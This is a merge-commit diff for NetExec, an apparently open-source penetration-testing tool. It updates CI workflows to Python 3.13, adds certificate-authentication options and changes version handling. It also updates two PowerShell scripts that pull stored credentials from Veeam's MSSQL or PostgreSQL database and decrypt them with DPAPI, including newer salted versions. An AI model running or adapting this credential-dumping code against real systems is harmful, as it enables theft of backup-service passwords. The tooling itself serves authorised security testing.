Merge branch 'Pennyw0rth:main' into main

Author: KriyosArcane

.github/workflows/build-binaries.yml

@@ -10,7 +10,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, macOS-latest, windows-latest]
-        python-version: ["3.12"]
+        python-version: ["3.13"]
         #python-version: ["3.8", "3.9", "3.10", "3.11"] # for binary builds we only need one version
     steps:
     - uses: actions/checkout@v4

.github/workflows/build-zipapps.yml

@@ -10,7 +10,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, macOS-latest, windows-latest]
-        python-version: ["3.10", "3.11", "3.12"]
+        python-version: ["3.10", "3.11", "3.12", "3.13"]
     steps:
     - uses: actions/checkout@v4
     - name: NetExec set up python on ${{ matrix.os }}

.github/workflows/lint.yml

@@ -19,7 +19,7 @@ jobs:
       - name: Set up Python
         uses: actions/setup-python@v5
         with:
-          python-version: 3.12
+          python-version: 3.13
           cache: poetry
           cache-dependency-path: poetry.lock
       - name: Install dependencies with dev group

.github/workflows/test.yml

@@ -8,18 +8,20 @@ on:
 jobs:
   build:
     name: Test for Py${{ matrix.python-version }}
-    if: github.event.review.state == 'APPROVED'
+    if: github.event.review.state == 'APPROVED' || github.event_name == 'workflow_dispatch'
     runs-on: ${{ matrix.os }}
     strategy:
       max-parallel: 5
       matrix:
         os: [ubuntu-latest]
-        python-version: ["3.10", "3.11", "3.12"]
+        python-version: ["3.10", "3.11", "3.12", "3.13"]
     steps:
       - uses: actions/checkout@v4
       - name: Install poetry
         run: |
           pipx install poetry
+          poetry --version
+          poetry env info
       - name: NetExec set up python ${{ matrix.python-version }} on ${{ matrix.os }}
         uses: actions/setup-python@v5
         with:
@@ -29,11 +31,6 @@ jobs:
       - name: Install with pipx
         run: |
           pipx install . --python python${{ matrix.python-version }}
-      - name: Install poetry
-        run: |
-          pipx install poetry --python python${{ matrix.python-version }}
-          poetry --version
-          poetry env info
       - name: Install libraries with dev group
         run: |
           poetry install --with dev
@@ -48,4 +45,4 @@ jobs:
           poetry run netexec mssql 127.0.0.1
           poetry run netexec ssh 127.0.0.1
           poetry run netexec ftp 127.0.0.1
-          poetry run netexec smb 127.0.0.1 -M veeam
+          poetry run netexec smb 127.0.0.1 -L

LICENSE

@@ -1,4 +1,4 @@
-Copyright (c) 2023, Marshall-Hallenbeck, NeffIsBack, zblurx, mpgn_x64
+Copyright (c) 2025, Marshall-Hallenbeck, NeffIsBack, zblurx, mpgn_x64
 Copyright (c) 2022, byt3bl33d3r
 All rights reserved.
 

netexec.spec

@@ -30,6 +30,7 @@ a = Analysis(
         'impacket.tds',
         'impacket.version',
         'impacket.ldap.ldap',
+        'jwt',
         'nxc.connection',
         'nxc.servers.smb',
         'nxc.protocols.smb.wmiexec',
@@ -71,6 +72,7 @@ a = Analysis(
         'dploot.triage.masterkeys',
         'dploot.triage.mobaxterm',
         'dploot.triage.backupkey',
+        'dploot.triage.wam',
         'dploot.triage.wifi',
         'dploot.triage.sccm',
         'dploot.lib.target',

nxc/cli.py

@@ -19,11 +19,13 @@ def gen_cli_args():
 
     try:
         VERSION, COMMIT = importlib.metadata.version("netexec").split("+")
+        DISTANCE, COMMIT = COMMIT.split(".")
     except ValueError:
         VERSION = importlib.metadata.version("netexec")
         COMMIT = ""
+        DISTANCE = ""
     CODENAME = "NeedForSpeed"
-    nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT}")
+    nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
 
     generic_parser = argparse.ArgumentParser(add_help=False, formatter_class=DisplayDefaultsNotNone)
     generic_group = generic_parser.add_argument_group("Generic", "Generic options for nxc across protocols")
@@ -53,9 +55,9 @@ def gen_cli_args():
     ||   ||    | \ | |   ___  | |_  | ____| __  __   ___    ___
     \\( )//    |  \| |  / _ \ | __| |  _|   \ \/ /  / _ \  / __|
     .=[ ]=.    | |\  | |  __/ | |_  | |___   >  <  |  __/ | (__
-   / /ॱ-ॱ\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
-   ॱ \   / ॱ
-     ॱ   ॱ
+   / /˙-˙\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
+   ˙ \   / ˙
+     ˙   ˙
 
     The network execution tool
     Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
@@ -98,6 +100,13 @@ def gen_cli_args():
     kerberos_group.add_argument("--use-kcache", action="store_true", help="Use Kerberos authentication from ccache file (KRB5CCNAME)")
     kerberos_group.add_argument("--aesKey", metavar="AESKEY", nargs="+", help="AES key to use for Kerberos Authentication (128 or 256 bits)")
     kerberos_group.add_argument("--kdcHost", metavar="KDCHOST", help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
+
+    certificate_group = std_parser.add_argument_group("Certificate", "Options for certificate authentication")
+    certificate_group.add_argument("--pfx-cert", metavar="PFXCERT", help="Use certificate authentication from pfx file .pfx")
+    certificate_group.add_argument("--pfx-base64", metavar="PFXB64", help="Use certificate authentication from pfx file encoded in base64")
+    certificate_group.add_argument("--pfx-pass", metavar="PFXPASS", help="Password of the pfx certificate")
+    certificate_group.add_argument("--pem-cert", metavar="PEMCERT", help="Use certificate authentication from PEM file")
+    certificate_group.add_argument("--pem-key", metavar="PEMKEY", help="Private key for the PEM format")
 
     server_group = std_parser.add_argument_group("Servers", "Options for nxc servers")
     server_group.add_argument("--server", choices={"http", "https"}, default="https", help="use the selected server")
@@ -123,7 +132,7 @@ def gen_cli_args():
         sys.exit(1)
 
     if args.version:
-        print(f"{VERSION} - {CODENAME} - {COMMIT}")
+        print(f"{VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
         sys.exit(1)
 
     # Multiply output_tries by 10 to enable more fine granural control, see exec methods

nxc/connection.py

@@ -1,4 +1,7 @@
 import random
+import sys
+import contextlib
+
 from os.path import isfile
 from threading import BoundedSemaphore
 from functools import wraps
@@ -13,10 +16,9 @@
 from nxc.logger import nxc_logger, NXCAdapter
 from nxc.context import Context
 from nxc.protocols.ldap.laps import laps_search
+from nxc.helpers.pfx import pfx_auth
 
 from impacket.dcerpc.v5 import transport
-import sys
-import contextlib
 
 sem = BoundedSemaphore(1)
 global_failed_logins = 0
@@ -384,7 +386,7 @@ def parse_credentials(self):
             if isfile(user):
                 with open(user) as user_file:
                     for line in user_file:
-                        if "\\" in line:
+                        if "\\" in line and len(line.split("\\")) == 2:
                             domain_single, username_single = line.split("\\")
                         else:
                             domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
@@ -548,6 +550,14 @@ def login(self):
                 self.logger.info("Successfully authenticated using Kerberos cache")
                 return True
 
+        if self.args.pfx_cert or self.args.pfx_base64 or self.args.pem_cert:
+            self.logger.debug("Trying to authenticate using Certificate pfx")
+            if not self.args.username:
+                self.logger.fail("You must specify a username when using certificate authentication")
+                return False
+            with sem:
+                return pfx_auth(self)
+
         if hasattr(self.args, "laps") and self.args.laps:
             self.logger.debug("Trying to authenticate using LAPS")
             username[0], secret[0], domain[0] = laps_search(self, username, secret, cred_type, domain, self.dns_server)

nxc/data/veeam_dump_module/veeam_dump_mssql.ps1

@@ -1,9 +1,10 @@
 $SqlDatabaseName = "REPLACE_ME_SqlDatabase"
 $SqlServerName = "REPLACE_ME_SqlServer"
 $SqlInstanceName = "REPLACE_ME_SqlInstance"
+$b64Salt = "REPLACE_ME_b64Salt"
 
 #Forming the connection string
-$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
+$SQL = "SELECT [user_name] AS 'User', [password] AS 'Password', [description] AS 'Description' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
 $auth = "Integrated Security=SSPI;" #Local user
 $connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
 $connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
@@ -22,19 +23,46 @@ catch {
 	exit -1
 }
 
-$rows=($dataset.Tables | Select-Object -Expand Rows)
-if ($rows.count -eq 0) {
+$output=($dataset.Tables | Select-Object -Expand Rows)
+if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
-$rows | ForEach-Object -Process {
-	$EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+# Decrypting passwords using DPAPI
+$output | ForEach-Object -Process {
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $rows | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000

nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1

@@ -1,22 +1,50 @@
 $PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
 $PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
 $SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
+$b64Salt = "REPLACE_ME_b64Salt"
 
-$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
+$SQLStatement = "SELECT user_name AS User, password AS Password, description AS Description  FROM credentials WHERE password != '';"
 $output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
 
 if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
+# Decrypting passwords using DPAPI
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
 $output | ForEach-Object -Process {
-    $EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $output | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000